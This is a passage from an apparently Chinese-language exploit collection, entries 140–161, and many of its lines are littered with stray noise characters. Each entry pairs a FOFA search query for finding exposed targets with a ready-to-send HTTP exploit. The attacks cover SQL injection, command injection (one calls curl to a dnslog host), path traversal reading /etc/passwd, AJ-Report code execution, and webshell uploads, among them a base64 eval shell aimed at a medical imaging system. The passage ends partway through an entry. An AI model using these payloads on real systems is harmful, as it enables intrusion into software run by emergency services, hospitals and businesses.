2 J) T3 S) S: |. j1 TCVE-2024-2622% g) |+ N5 {+ x+ x6 V4 x
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
, D3 y% z6 B$ |" `3 e5 H6 [GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1/ p& Z# \8 k5 Y( t0 {
Host: x.x.x.x |+ O& M% g) `: H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 X2 o" K! h4 l' r( PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ \4 u; @2 Y# sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 D2 k7 x! C+ }* V9 v: t" Z
Accept-Encoding: gzip, deflate, br8 Y% D8 C7 O6 h: t+ N) k$ R7 d
Connection: close
3 U4 `9 ^& U( V. \Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
& a0 |& ?" Z" K& iUpgrade-Insecure-Requests: 1
2 T/ j" F5 {% M* N. ~7 ]6 T+ v J' ~) i% |9 z' c$ R
/ j5 X( F7 D9 K) z
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入3 u( |5 b- I" q7 _. W
CVE-2024-2566& K) J9 P& N- `/ k# E
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; c. i; [( R6 UGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
. j3 j% Y3 @2 q0 c1 k, @8 y3 ]: I1 i5 `8 DHost: x.x.x.x% c' Y. Y X6 t2 d* A9 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
, `7 J9 q0 U2 g! y% e. ~5 f" \$ k3 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 b3 L) N( T8 L) y0 u/ q- C/ W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- w) v5 u; ]$ jAccept-Encoding: gzip, deflate, br9 A# r; e ]9 Q g
Connection: close9 i9 k: f4 f& _
Cookie: authcode=h8g9
p4 S1 F' ]% c6 MUpgrade-Insecure-Requests: 1
3 [+ A1 I+ v) O8 j# T
& F# S3 ^& x1 |$ u, E* J @ i3 @0 J% D$ |7 G- g7 X
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
' r0 ^6 Z4 m. Y' K8 @FOFA:body="指挥调度管理平台"
: t: L# A1 P/ o8 i! GPOST /app/ext/ajax_users.php HTTP/1.1
" j; |9 l% r5 y7 I5 \Host: your-ip1 |* ]4 n0 [% H; V G
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info( T$ _: v2 w& w/ j6 A* c
Content-Type: application/x-www-form-urlencoded
) q) D6 d9 R: c5 U$ l7 [) Y/ E5 }' e9 H. E
0 s& p1 X2 r- F8 P: @8 ~
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -* O) R$ e" n- Q1 u6 W4 r
6 X J- ?, q3 ~' C7 o
' P5 e& S" m$ \/ ], g* X# y142. CMSV6车辆监控平台系统中存在弱密码
, R4 h) o3 k1 |' v# ]9 L9 DCVE-2024-29666! }# r- Z0 T, [' G8 M9 \3 @
FOFA:body="/808gps/"# _" i4 _: a. e x0 }9 {( b
admin/admin8 E, N M3 q; c" c- u$ P
143. Netis WF2780 v2.1.40144 远程命令执行
2 B. W! b* h; l6 bCVE-2024-25850
8 e/ Z* M0 A- S4 RFOFA:title='AP setup' && header='netis'. v; _5 K- D1 f6 ^
PAYLOAD1 [4 M: ~9 O6 M1 f. S1 R) d
/ D& ~: [# Z. S D' V
144. D-Link nas_sharing.cgi 命令注入6 C* u& C- \) ^0 [ W
FOFA:app="D_Link-DNS-ShareCenter"
2 o% d' @* ]8 w' q) B6 ]- H% Qsystem参数用于传要执行的命令
7 Q4 [' i( ?# ], u: WGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
# j n! ^/ q2 V/ jHost: x.x.x.x
- y( F s, w/ X4 c5 ]User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.03 z0 k+ ~4 N6 Y w. J6 j
Connection: close6 l# T$ b% m0 I7 f$ ]9 I" D" F# o) n
Accept: */*
: ~( G2 L. k* K A2 XAccept-Language: en, o/ B4 P; R" _- R! s! V! ]+ f
Accept-Encoding: gzip
3 l5 n7 M" ~8 g0 x& |9 p8 {) p* A8 Z5 g$ M! B
% c, s1 L- F- D m$ ]4 _$ ^7 l
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# P* v' M6 S9 W O
CVE-2024-3400% v2 t7 p" k# t F
FOFA:icon_hash="-631559155"
+ e$ x6 z, X) T+ ]GET /global-protect/login.esp HTTP/1.1
{0 ^5 B$ V' g: F5 g. Y9 z) uHost: 192.168.30.112:1005
! w' ]: U; W& S9 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
6 v- X' e6 a1 x: L( j$ EConnection: close
6 D* O; c% n1 d" A# E1 Q1 ^Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;" P3 O7 K3 Y- z5 S+ s
Accept-Encoding: gzip$ v) |2 {7 M7 Y. V: w0 s3 v
; {+ y% q+ e5 [8 S% ~* Y& A' w+ Z. z8 T! @* H8 |
146. MajorDoMo thumb.php 未授权远程代码执行! _* I3 h$ v9 Y2 t
CNVD-2024-02175
$ `. a* a0 A2 K. G9 d3 g' l# F9 L0 E4 {FOFA:app="MajordomoSL"6 x$ s" W7 o: S" l; `4 h$ l4 z d
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
7 F; H6 g" g, q+ iHost: x.x.x.x
' ]: S; l4 O0 K) Q# l0 ^' kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.849 y* [" \' ]0 `* m5 w, p+ U5 j; J
Accept-Charset: utf-82 p/ u8 c8 [0 X1 |% n @
Accept-Encoding: gzip, deflate& A, | @! f( _7 U* Z
Connection: close, |) U1 `/ q* l" G: S4 ]" ~
: b/ C0 `1 W5 C2 o) t# T4 s
. @# e8 Q3 U' I5 Z; H m, q147. RaidenMAILD邮件服务器v.4.9.4-路径遍历- q0 _' a# N9 f* Q
CVE-2024-32399, W: S& A; q* \1 \! D) n9 M
FOFA:body="RaidenMAILD"
# Z9 [- d2 c5 u9 E5 h7 Z, g" p9 @GET /webeditor/../../../windows/win.ini HTTP/1.1
1 T! }, {) t+ m+ _9 jHost: 127.0.0.1:814 Q9 D6 n! H$ e( [4 W1 d' u; O
Cache-Control: max-age=0
1 j. P. b4 @( m$ ?8 TConnection: close
) \3 n1 n6 ~% Q/ N/ v$ c' u8 e; i+ K _8 R0 b `: S
$ m" W2 R& h" m. [. F148. CrushFTP 认证绕过模板注入
2 ~: t2 e, c% J3 Y6 _0 p& HCVE-2024-4040
( v$ k# k U: s! eFOFA:body="CrushFTP"' Z+ o6 h- ]$ X; ]5 G
PAYLOAD
1 A' M! Q6 ^( ~! F* q+ C1 ?: ]& t1 Q! f, ^
149. AJ-Report开源数据大屏存在远程命令执行" C ~( l% A* y) H
FOFA:title="AJ-Report") h0 Q! L E3 r1 \
9 r. @) V( t. S% K) w! j3 [POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
2 S0 x2 ?: y' p* L/ PHost: x.x.x.x
/ G7 t) w, ~8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 {6 V" A1 Q: I- k. f! {; CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! B, E. D+ e7 x) E- i' fAccept-Encoding: gzip, deflate, br
" M J$ `: m, dAccept-Language: zh-CN,zh;q=0.9
, d6 ` _9 ]: M" i1 \) XContent-Type: application/json;charset=UTF-8
# q* u" ?2 O* rConnection: close
- t8 t6 Z9 ]2 z" z, O1 W
4 z2 n3 x3 N0 o+ ^; t$ y& O; k{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}# P* D4 s3 p* ^% b" Q ~
8 G1 l9 i, p7 }* H% l/ K; {( ^6 U
150. AJ-Report 1.4.0 认证绕过与远程代码执行6 O, k4 D# K+ ~- b. ?
FOFA:title="AJ-Report"
4 q2 r! o" S* T" g4 l* l7 uPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
^7 q$ @/ c0 _/ I' yHost: x.x.x.x
' D. u8 \. r/ y# g1 G' a b3 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* j8 R: C! A, l2 B: L/ c V' r. q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- h( [; F* F- Y, |2 G8 [4 a% g
Accept-Encoding: gzip, deflate, br* j& L* f' S6 Z$ m, T$ }: i5 P* ]
Accept-Language: zh-CN,zh;q=0.9
8 `2 }: w) k9 K# c' ?Content-Type: application/json;charset=UTF-8
% G' d0 P) y8 [$ A" M4 P! l3 N J' sConnection: close2 A6 U$ o0 }" m# ]& F
Content-Length: 339, v( k0 S) m* ^ G j) d. b
0 @" w+ k5 c: {. N7 o, _
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}9 `% I& Y. a$ p) _! ?
& C7 b0 P$ z4 E; }
& K- p/ ?! J' R: `/ j151. AJ-Report 1.4.1 pageList sql注入
1 R$ f, f) K8 y" @; O' \FOFA:title="AJ-Report"
$ B' r; p3 m m0 {0 a: S2 QGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1 X, Y' L% A2 a9 m' l4 r G
Host: x.x.x.x
" U P `* s& YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' f4 E5 m+ X8 i( s% t {6 u [
Connection: close# I/ R' L0 R& Q k. ]
Accept-Encoding: gzip
9 W) q" Y3 Z: k$ R% d+ F6 S. F) C' |) c
1 V3 E7 _- P7 \* t! V
152. Progress Kemp LoadMaster 远程命令执行# N/ A; n- R5 S$ ^# z0 W
CVE-2024-1212
' n/ n& E& X# i" iLoadMaster <= 7.2.59.2 (GA)
8 U' o/ ~( z: b$ B/ i- Z' HLoadMaster<=7.2.54.8 (LTSF)
' b! o2 }. }. LLoadMaster <= 7.2.48.10 (LTS)) Q# W) n7 i( M* \: V* d2 _
FOFA:body="LoadMaster"
5 w, h7 J4 Z; P. b1 p6 YJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
& v2 ^3 P9 U5 o! W! ~8 G+ X% G! QGET /access/set?param=enableapi&value=1 HTTP/1.18 S5 t7 W- u g+ p
Host: x.x.x.x3 W6 b# s+ e$ w" ~' U* v' Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.10 R6 Q* \/ x `: J L
Connection: close
b9 l# I' ]: u4 x+ zAccept: */*& k8 u2 `( X4 h+ [; O7 L
Accept-Language: en
- `4 z3 m' Q5 x! f3 vAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=9 I5 y* X5 |; k+ s$ N" T) s( `
Accept-Encoding: gzip
U+ H0 J7 f$ G
N0 U. g% |, _: c
' \6 c6 J9 L( T! o153. gradio任意文件读取- A# B; h& i% G. S4 G3 r! q6 q
CVE-2024-1561FOFA:body="__gradio_mode__"
% g/ q) _; O; v第一步,请求/config文件获取componets的id
1 b& N% v8 e7 S7 Thttp://x.x.x.x/config
?: Y7 J+ j- T% \# I; O5 ?2 A, u t$ ^& T( Z
8 w9 X1 U6 }% c4 L3 R; o第二步,将/etc/passwd的内容写入到一个临时文件, O& n( O! R9 h- B0 T/ m4 [; S, b
POST /component_server HTTP/1.10 F1 K" [4 g: H! [' O
Host: x.x.x.x$ A; L5 R* |6 S4 h. K# b" e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3% T" Y8 B) a, I: k
Connection: close
! @# M% Q) l G; ^( RContent-Length: 115
: Y* P( y' ~- Z, q& vContent-Type: application/json) R. G$ `- E5 F% F: b
Accept-Encoding: gzip
6 p* h3 H; O# [4 Y' z% J c: p! S' }) X3 K0 k. K
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}. G1 M) e: Z& X$ _7 K
7 @8 r5 ?: R# {( H9 w1 |0 z N; p- y
第三步访问
) Z- p2 }% x3 l; Bhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd. ^/ a5 N; K. u& B Z3 A8 M
- [! ^: N( g) |
/ `) m( N; c! U154. 天维尔消防救援作战调度平台 SQL注入
& c# |' e6 u; h- U o |3 W- T* ]CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
% N- e0 ]) {9 n( Y9 l. U; wPOST /twms-service-mfs/mfsNotice/page HTTP/1.1. v& Y3 A* }2 }3 h- g: U4 p- {* h
Host: x.x.x.x8 _: N0 H3 b* V0 c! q
Content-Length: 106) K: g2 b% m% b! o
Cache-Control: max-age=0
+ S' O% b/ T' V: V* R3 V7 @" cUpgrade-Insecure-Requests: 1% P& {6 e: j: D# \
Origin: http://x.x.x.x
1 s# `/ l$ `! |" h* BContent-Type: application/json
z0 {0 V# Q5 _, V4 M0 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
1 Y5 J- c# f5 `/ x! c, `4 R1 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! S! E: e1 A8 u! A% V3 k/ ?Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page8 y% z4 m6 |$ \4 V9 G6 g i5 h
Accept-Encoding: gzip, deflate+ {+ k4 d. R: V$ [7 x6 r: L! T
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.78 M" K9 e; _; `0 Z
Connection: close
5 E) _5 G1 C* e3 T' Q+ b6 m. `- K& Q0 z% P
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
5 w& f9 d' G N
4 [8 Q& X+ {* A7 [% ]& n% ], ^4 K1 t# L" a4 A
155. 六零导航页 file.php 任意文件上传5 U _; r& `9 c& z1 O
CVE-2024-34982
$ m- c! u; i! L1 uFOFA:title=="上网导航 - LyLme Spage"
7 U# s% }$ X8 l" zPOST /include/file.php HTTP/1.11 v8 n4 G2 E: }2 e
Host: x.x.x.x
$ {% `/ W7 u9 j SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- R- V, O0 ~- t: r
Connection: close
* [! M: j$ ]6 tContent-Length: 232+ L* B7 M3 H2 M0 G; v& g. F
Accept: application/json, text/javascript, */*; q=0.01
9 l1 }$ h. L9 Z+ j$ }. lAccept-Encoding: gzip, deflate, br* W8 ?+ g8 z$ W( W/ z, e$ S2 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* I/ R5 V" M9 E6 J; \, M$ c
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
, Q% J3 A1 Q2 Z# ZX-Requested-With: XMLHttpRequest! m$ y p0 C, {2 Z+ }
# E2 n1 H8 A: ?! Z6 }5 F$ V-----------------------------qttl7vemrsold314zg0f
5 ~3 E; m- \8 Q+ V* O- I3 dContent-Disposition: form-data; name="file"; filename="test.php"
6 e& e/ S& K, a. UContent-Type: image/png3 G( [: W% A& \! T( }) X! m
! r* Z6 F- M* C) j<?php phpinfo();unlink(__FILE__);?>4 b( H C: t" E
-----------------------------qttl7vemrsold314zg0f--
1 C ^, @. G' N5 Z6 }# B
2 q2 Z( Q9 Q* I6 k( b* ^
/ I& B1 K9 V" b访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php% U" N5 C( X1 s' r3 h% Y/ E8 B
4 q0 a+ D/ q. W9 j* ]156. TBK DVR-4104/DVR-4216 操作系统命令注入
9 i1 {: P; ]! ?CVE-2024-3721
) R* m" ?8 ~/ X) e6 `FOFA:"Location: /login.rsp"
3 Y6 x: }% S, D- R( E/ U·TBK DVR-4104- r; Z G+ j/ u- _5 ~; y* V* A7 |
·TBK DVR-4216
% e5 q" }9 F x8 n/ ncurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"* G; V2 P4 E, j: C
7 o+ m' d& b q# b3 E
& h `( x1 m5 p% J0 ~' OPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1) I/ ~( S4 X5 b6 ]8 e
Host: x.x.x.x
6 L; h' j# h0 TUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 X4 n" I q! t) F
Connection: close
+ f+ f6 B9 u8 g# UContent-Length: 0
8 w% S) f* a" lCookie: uid=1$ p1 F$ [8 B2 w8 _3 d* t
Accept-Encoding: gzip- _% ?2 M9 p; K( A X, l# k1 J
6 B$ Q. O/ ^4 @* H7 B
2 t+ A+ S& V7 h7 l9 d" i4 \157. 美特CRM upload.jsp 任意文件上传1 d7 V/ Y/ [# f5 H6 X
CNVD-2023-069710 @4 F, C; R) w. o' G' t* L6 ~- m
FOFA:body="/common/scripts/basic.js"
1 v/ {; i: Y4 n$ V, i9 APOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.13 ^! q) |7 }5 a: U
Host: x.x.x.x
4 D6 f5 R! `8 q! F! LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.363 t" Z u) A! i
Content-Length: 709' f4 @2 Q0 [' z6 E( X' k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! A8 _- d) S& m9 f: N. rAccept-Encoding: gzip, deflate
* b! b6 F& j" l& eAccept-Language: zh-CN,zh;q=0.9
: j S! E* j4 w2 UCache-Control: max-age=0
5 O! e, ]5 U T( E5 o x. ?Connection: close0 R0 y2 P( Q( k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN" X' g/ D% K* K
Upgrade-Insecure-Requests: 1% p3 x& O4 [2 w, P) x
$ {# K/ I& x. c4 s+ n( t
------WebKitFormBoundary1imovELzPsfzp5dN& F4 n5 l9 c+ j5 ]5 D' S
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"# g- e8 C9 f( K6 p
Content-Type: application/octet-stream% q* ?2 y( S% \' N, k& V5 [7 C( h
# A- e- L/ i( p. W l: qnyhelxrutzwhrsvsrafb4 U3 P8 X1 X* K
------WebKitFormBoundary1imovELzPsfzp5dN
0 }1 ], T$ j- q7 \1 ^/ `/ p) N' UContent-Disposition: form-data; name="key"4 G$ i6 |" V0 H2 [4 i
* G: o" S; f) v, N; y1 R* Ynull- ?; Q5 J: O, y
------WebKitFormBoundary1imovELzPsfzp5dN
8 K1 U, L# {) {5 B1 ~Content-Disposition: form-data; name="form"
( a0 y) v' J- D* T
7 n" n: r# g$ ]2 N0 L* b. x" Xnull& y1 [; Y: \0 z. a, n( p# D- \
------WebKitFormBoundary1imovELzPsfzp5dN
- U5 ^9 o2 ^0 z+ l7 R: SContent-Disposition: form-data; name="field"* P2 b( Z* u! e2 k/ K+ g5 h
! n3 {; h* R) ]: h' y: M
null" k; G1 O4 u3 G
------WebKitFormBoundary1imovELzPsfzp5dN
6 v' z1 T% x( I9 ^& D- ~Content-Disposition: form-data; name="filetitile"
) p) E! v4 T' Y* z4 n5 \* M6 @6 O
4 T5 Q4 z: R% X6 a7 a. |& k; ~' }null
( k) d/ S3 N7 m( y------WebKitFormBoundary1imovELzPsfzp5dN w6 `; S \" |; i
Content-Disposition: form-data; name="filefolder"
8 }. N. u' Z8 w4 m- I1 K# R6 q5 m+ z; U" `
null. B# u5 R( y' f2 r
------WebKitFormBoundary1imovELzPsfzp5dN--
; P8 S2 k6 [* ~2 |5 _, T6 A
7 P$ m* N# ]' ^. B# N. f4 ~# w& f4 |9 N# V2 \6 i$ n* I
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
; j; B$ v4 r9 M+ E; u9 k$ |' B2 v0 f* h% h/ R* Z$ U4 ?
158. Mura-CMS-processAsyncObject存在SQL注入
/ E+ f8 u5 o3 X+ U; x& yCVE-2024-32640
7 f# o# U2 K" ]" w0 UFOFA:"Generator: Masa CMS" |% a: A; K4 Y3 j. O7 y
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
& J) G. { r' }Host: {{Hostname}}
( x- ]) v0 T6 sContent-Type: application/x-www-form-urlencoded
- x/ B0 Z3 }; c* z) s8 y
0 [% K6 X7 i8 B. q2 w2 n6 hobject=displayregion&contenthistid=x\'&previewid=1
6 }% J. W+ `3 _1 C! h9 x$ ^& f% X0 A8 E6 h: m+ N
5 ?; \4 u5 p. M) z! ]
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传0 d9 R3 K' b5 t7 X, ~6 D% k, [
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")9 Y/ m0 [ E: ?
POST /webservices/WebJobUpload.asmx HTTP/1.1
8 ~3 c& P K" B3 c& C3 M2 jHost: x.x.x.x- q. b2 s& q! a8 t4 q7 p9 d/ P% g3 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36( g1 x0 H: q! q. S; J/ @
Content-Length: 1080/ ^3 O2 s/ |" z0 p$ @ W L
Accept-Encoding: gzip, deflate [+ U: w6 T6 C3 @! ^6 R
Connection: close; z) }* r" Q; G6 \
Content-Type: text/xml; charset=utf-8
" L; D" G" A7 ~# j! n' l- X/ X3 B: b$ qSoapaction: "http://rainier/jobUpload"" F; E: o3 ?9 n" ~
; A& B) l0 b2 |0 Z* j7 @ A. c<?xml version="1.0" encoding="utf-8"?>& g+ A. @! S, {' U$ q
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 [& v; y H6 Z+ _0 d: ?6 E<soap:Body>
: c: Z/ ]7 k; _<jobUpload xmlns="http://rainier">/ c2 ` ^% J) I9 B+ ?
<vcode>1</vcode>7 F& n5 ~. V o _1 y1 V( B
<subFolder></subFolder>
/ C* h4 R$ `$ P% _<fileName>abcrce.asmx</fileName>
1 e" l6 {8 B( ^' ]/ E1 h<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
2 i6 @. H8 {0 n1 A7 p</jobUpload>
. I( B; B. C B3 g' e9 J- \</soap:Body>
1 I6 H5 H. Q/ f- V. Q% r! U9 I</soap:Envelope>
- t2 }3 p( M8 C" e/ N( M/ _6 u4 ^) m* }
. Y6 l. A6 s) O& p
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")( X9 t( S; y! R7 l$ q- P
' X. O Y5 h0 J6 K- r) R9 @7 J0 i9 o! `5 l: @! \
160. Sonatype Nexus Repository 3目录遍历与文件读取
' Q) Q( ^! w! }3 l1 dCVE-2024-4956
% u. F, f3 b! x. n+ }- bFOFA:title="Nexus Repository Manager"6 y/ m' U; L; n h5 S- X
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1% s/ u( b( m) ?/ v/ K" V1 D
Host: x.x.x.x
+ v7 b( J) u- P' p5 \4 d' C' ^" ]User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0: d; h. ~) T, b2 ~3 X% V
Connection: close
8 W7 X4 C( |8 c. h% sAccept: */*
5 D: e3 C |1 j8 R! x2 L) ?, LAccept-Language: en
/ B$ g0 H8 t% r3 jAccept-Encoding: gzip8 G# U$ B8 H/ Z/ ^
T3 A, z5 D" ^' E2 w6 N. ~
% a8 i' Q& Q4 r7 W& |# V
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
) A, z* R1 |2 U* U4 r6 M: [FOFA:body="/KT_Css/qd_defaul.css"9 p/ Z1 ]0 v4 x7 R/ O1 v% |
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
8 P" f8 f# h, M9 YPOST /Webservice.asmx HTTP/1.1 y% ?4 l+ g& ^: [
Host: x.x.x.x3 \, I0 X" `8 G' Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
1 u: i; o: G! _4 q, ^Connection: close
% C P2 p( `+ L' AContent-Length: 445* F0 B2 s: Y- [# A
Content-Type: text/xml# _. O A) C0 Y6 m% z- x3 h
Accept-Encoding: gzip
/ t l0 q; Y, ~0 I$ y
% n+ P I/ E/ _( M$ e6 V8 a; i<?xml version="1.0" encoding="utf-8"?>
D) T" G. h4 e( A<soap:Envelope xmlns:xsi=") D7 b+ k# L; L) y- o8 W# a
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" |$ j# p! h4 j6 K
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
, q# C2 M5 m" T' d& N<soap:Body>" {: u+ ^# [0 _" Z$ r# z& W3 {7 a/ G
<UploadResume xmlns="http://tempuri.org/">) k8 E+ z8 e+ j% x$ J, J) f
<ip>1</ip>9 P7 L+ F7 H1 w4 {; E$ Y
<fileName>../../../../dizxdell.aspx</fileName>7 T6 f6 [4 Y2 s+ c$ @3 p! d
